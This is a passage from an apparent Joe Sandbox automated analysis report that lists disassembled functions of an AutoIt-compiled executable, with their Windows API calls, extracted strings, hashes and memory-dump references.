                                      • Part of subcall function 0099E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0098C8B7,?,00002000,?,?,00000000,?,0098419E,?,?,?,00A1DC00), ref: 0099E984
                                      • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                    • __wsplitpath.LIBCMT ref: 0098C93E
                                      • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                    • _wcscpy.LIBCMT ref: 0098C953
                                    • _wcscat.LIBCMT ref: 0098C968
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0098CABE
                                      • Part of subcall function 0098B337: _wcscpy.LIBCMT ref: 0098B36F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 2258743419-1018226102
                                    • Opcode ID: 1e18d631169abec49290b9dfe2ffb72e93baa39c8eeb3479deed1f643d9f1c1b
                                    • Instruction ID: f8ce61fd829ff1015653d856b32fa9d4fe141fc0acbcfe0576f5f9265350bcd0
                                    • Opcode Fuzzy Hash: 1e18d631169abec49290b9dfe2ffb72e93baa39c8eeb3479deed1f643d9f1c1b
                                    • Instruction Fuzzy Hash: 99129C715083459FC724EF24C881AAFBBE8BFD9314F44491EF589932A1DB34DA49CB62
                                    Function 009ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009ECEFB
                                    • DestroyWindow.USER32(?,?), ref: 009ECF73
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009ECFF4
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009ED016
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED025
                                    • DestroyWindow.USER32(?), ref: 009ED042
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 009ED075
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED094
                                    • GetDesktopWindow.USER32 ref: 009ED0A9
                                    • GetWindowRect.USER32(00000000), ref: 009ED0B0
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009ED0C2
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009ED0DA
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 3877571568-3619404913
                                    • Opcode ID: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
                                    • Instruction ID: 1df9e29ff17ce9fa30023324b652653118b1b0c5984b2613c54eee68d855cc4c
                                    • Opcode Fuzzy Hash: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
                                    • Instruction Fuzzy Hash: 1171CAB9140345AFDB21CF68CC84F6A7BE9EB89704F08491DF985872A1D735EC42CB22
                                    Function 009CAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 009CAB3D
                                    • VariantCopy.OLEAUT32(?,?), ref: 009CAB46
                                    • VariantClear.OLEAUT32(?), ref: 009CAB52
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009CAC40
                                    • __swprintf.LIBCMT ref: 009CAC70
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 009CAC9C
                                    • VariantInit.OLEAUT32(?), ref: 009CAD4D
                                    • SysFreeString.OLEAUT32(00000016), ref: 009CADDF
                                    • VariantClear.OLEAUT32(?), ref: 009CAE35
                                    • VariantClear.OLEAUT32(?), ref: 009CAE44
                                    • VariantInit.OLEAUT32(00000000), ref: 009CAE80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 3730832054-3931177956
                                    • Opcode ID: 877476de33281fbb4b4d9772b75ea99ae3234b9bf9105ad2d110e51ac46dc30f
                                    • Instruction ID: 835a573ac40c31f0bc51480bc85f8d7f184f42ef28f54cad9dfddb07a783391e
                                    • Opcode Fuzzy Hash: 877476de33281fbb4b4d9772b75ea99ae3234b9bf9105ad2d110e51ac46dc30f
                                    • Instruction Fuzzy Hash: 29D1EF71E00219EFCB249FA5D884F6AB7B9BF44704F14885DE4069B291DB78EC40DBA3
                                    Function 009E716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 009E71FC
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009E7247
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: a94001bff2ed6f83daafcc1cec8c4741f2090281f1bfaee04f5500560463699c
                                    • Instruction ID: d5c1a76b3c4409fb5c9e17d974c0a0e4887db12a7551daa6d9170d527d462d05
                                    • Opcode Fuzzy Hash: a94001bff2ed6f83daafcc1cec8c4741f2090281f1bfaee04f5500560463699c
                                    • Instruction Fuzzy Hash: 79917E702087419BCB05EF65C851B6EB7A5BF94310F04485DF8966B3A3EB34ED0ADB92
                                    Function 009EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009EE5AB
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009EBEAF), ref: 009EE607
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE647
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE68C
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE6C3
                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,009EBEAF), ref: 009EE6CF
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009EE6DF
                                    • DestroyCursor.USER32(?), ref: 009EE6EE
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009EE70B
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009EE717
                                      • Part of subcall function 009A0FA7: __wcsicmp_l.LIBCMT ref: 009A1030
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    • Opcode ID: 3c0bcffe51950de87785ccfb0cdb140a8b0bbcd53350052f414b7a7ba0a4a201
                                    • Instruction ID: 7ccc2e305b1d4abdc7b0ee8caf173012c9ee7af1d7d544c6591dd834ed1b2186
                                    • Opcode Fuzzy Hash: 3c0bcffe51950de87785ccfb0cdb140a8b0bbcd53350052f414b7a7ba0a4a201
                                    • Instruction Fuzzy Hash: 4461F171500259FAEB25DFA5CC86FBE77ACBB08B24F104505F911E61D1EB70AE81CBA0
                                    Function 009CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CharLowerBuffW.USER32(?,?), ref: 009CD292
                                    • GetDriveTypeW.KERNEL32 ref: 009CD2DF
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD327
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD35E
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD38C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1148790751-4113822522
                                    • Opcode ID: 05100e93d8face1f542d3dc8915a67d7243e63f04898d3db26552bf7481c5bc7
                                    • Instruction ID: 32f8dc54ab2ac02ec119172c02775f8f6bcbe1fdcc094b38a5d70d4d30bf756e
                                    • Opcode Fuzzy Hash: 05100e93d8face1f542d3dc8915a67d7243e63f04898d3db26552bf7481c5bc7
                                    • Instruction Fuzzy Hash: 05510A72508605AFC700EF24C991A6AB7E8FF98758F10486DF89567391DB31EE0ACB52
                                    Function 009C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?), ref: 009C26F1
                                    • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C26FA
                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?,00000016), ref: 009C271C
                                    • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C271F
                                    • __swprintf.LIBCMT ref: 009C276F
                                    • __swprintf.LIBCMT ref: 009C2780
                                    • _wprintf.LIBCMT ref: 009C2829
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C2840
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 618562835-2268648507
                                    • Opcode ID: e43d4e20d14ec9b6b8bd42fa1b7ce2d25959bc35dcc9a9055a0488b5adfb908a
                                    • Instruction ID: 16aa520db3dcefe28bf3872ca3b5c92f897715d036e9940f66bce36b55dd6f94
                                    • Opcode Fuzzy Hash: e43d4e20d14ec9b6b8bd42fa1b7ce2d25959bc35dcc9a9055a0488b5adfb908a
                                    • Instruction Fuzzy Hash: DB414F72800219BBCF14FBE0DD96FEEB778AF95344F100469B50176192EA34AF49CBA1
                                    Function 009CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009CD0D8
                                    • __swprintf.LIBCMT ref: 009CD0FA
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 009CD137
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009CD15C
                                    • _memset.LIBCMT ref: 009CD17B
                                    • _wcsncpy.LIBCMT ref: 009CD1B7
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009CD1EC
                                    • CloseHandle.KERNEL32(00000000), ref: 009CD1F7
                                    • RemoveDirectoryW.KERNEL32(?), ref: 009CD200
                                    • CloseHandle.KERNEL32(00000000), ref: 009CD20A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: f77b7d8988bc89a95cdd21ea91ad5952cb9aee5399fb180ca8021cfaa0ed53e8
                                    • Instruction ID: 2069bfdc41a8c93e409f24f9c96873be1accec7b848c79921bef206380427fbc
                                    • Opcode Fuzzy Hash: f77b7d8988bc89a95cdd21ea91ad5952cb9aee5399fb180ca8021cfaa0ed53e8
                                    • Instruction Fuzzy Hash: 1131C2B2900109ABDB21DFE4CC49FEB37BCEF89700F1041BAF519D21A1EB7096468B65
                                    Function 009EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009EBEF4,?,?), ref: 009EE754
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE76B
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE776
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE783
                                    • GlobalLock.KERNEL32(00000000), ref: 009EE78C
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE79B
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009EE7A4
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7AB
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7BC
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A0D9BC,?), ref: 009EE7D5
                                    • GlobalFree.KERNEL32(00000000), ref: 009EE7E5
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 009EE809
                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 009EE834
                                    • DeleteObject.GDI32(00000000), ref: 009EE85C
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009EE872
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: 0d0e4dd9958a56ed702592ed4402245d056587ea6a22a451a5e3cf64a056e4c8
                                    • Instruction ID: fbf30fd0daefdcab56aff4e7fea249a81101722125618741366e5a6fad6fd350
                                    • Opcode Fuzzy Hash: 0d0e4dd9958a56ed702592ed4402245d056587ea6a22a451a5e3cf64a056e4c8
                                    • Instruction Fuzzy Hash: F9414A76600209FFDB11DFA5DC88EAA7BB8EF89715F108458F90AD7260D7319D42CB20
                                    Function 009D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 009D076F
                                    • _wcscat.LIBCMT ref: 009D0787
                                    • _wcscat.LIBCMT ref: 009D0799
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D07AE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D07C2
                                    • GetFileAttributesW.KERNEL32(?), ref: 009D07DA
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 009D07F4
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0806
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    • Opcode ID: 36cb35beb727fd31c635ed354a77f22a3e82816b036c5c23c7e3b4291ec9eb91
                                    • Instruction ID: a9895991b9ed2b37a141578608eae015e0daf0c1e6b5c612cd0d10f6ea2d0810
                                    • Opcode Fuzzy Hash: 36cb35beb727fd31c635ed354a77f22a3e82816b036c5c23c7e3b4291ec9eb91
                                    • Instruction Fuzzy Hash: 15817A725443019FCB24EF64C845A6EB7E8ABD8304F58CD2FF889C7351EA34E9558B92
                                    Function 009BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                      • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                      • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                      • Part of subcall function 009BABBB: RtlAllocateHeap.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                      • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                      • Part of subcall function 009BAC56: RtlAllocateHeap.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                      • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA8CB
                                    • _memset.LIBCMT ref: 009BA8E0
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA8FF
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA910
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 009BA94D
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA969
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA986
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA995
                                    • RtlAllocateHeap.KERNEL32(00000000), ref: 009BA99C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA9BD
                                    • CopySid.ADVAPI32(00000000), ref: 009BA9C4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA9F5
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BAA1B
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BAA2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: fe48a449652a4b41683c138cd50b93e7fce95ad0ea456cb30e89e36227d99424
                                    • Instruction ID: 7c0e30f274911eaec0af161b7ccc8d84be0a8dfc2e8f70fcf0be4b2dabbbef34
                                    • Opcode Fuzzy Hash: fe48a449652a4b41683c138cd50b93e7fce95ad0ea456cb30e89e36227d99424
                                    • Instruction Fuzzy Hash: 16512B71900219AFDF14DFD4DE85AEEBBBAFF44310F048129F916A7290DB359A06CB61
                                    Function 009CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-2391861430
                                    • Opcode ID: b2c8d6240c640cc3b0ffdbb92503862959e64ad4d8b92873acbccc9b22c7d014
                                    • Instruction ID: d2be4fa80fffaa7609bbb8058a81da665d59d1e0fc8d86a6851dc4316e6cc89f
                                    • Opcode Fuzzy Hash: b2c8d6240c640cc3b0ffdbb92503862959e64ad4d8b92873acbccc9b22c7d014
                                    • Instruction Fuzzy Hash: 52516B72800509BACB15FBE0CD46FEEBB78AF85304F10056AF505721A2EB316E99DB61
                                    Function 009CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
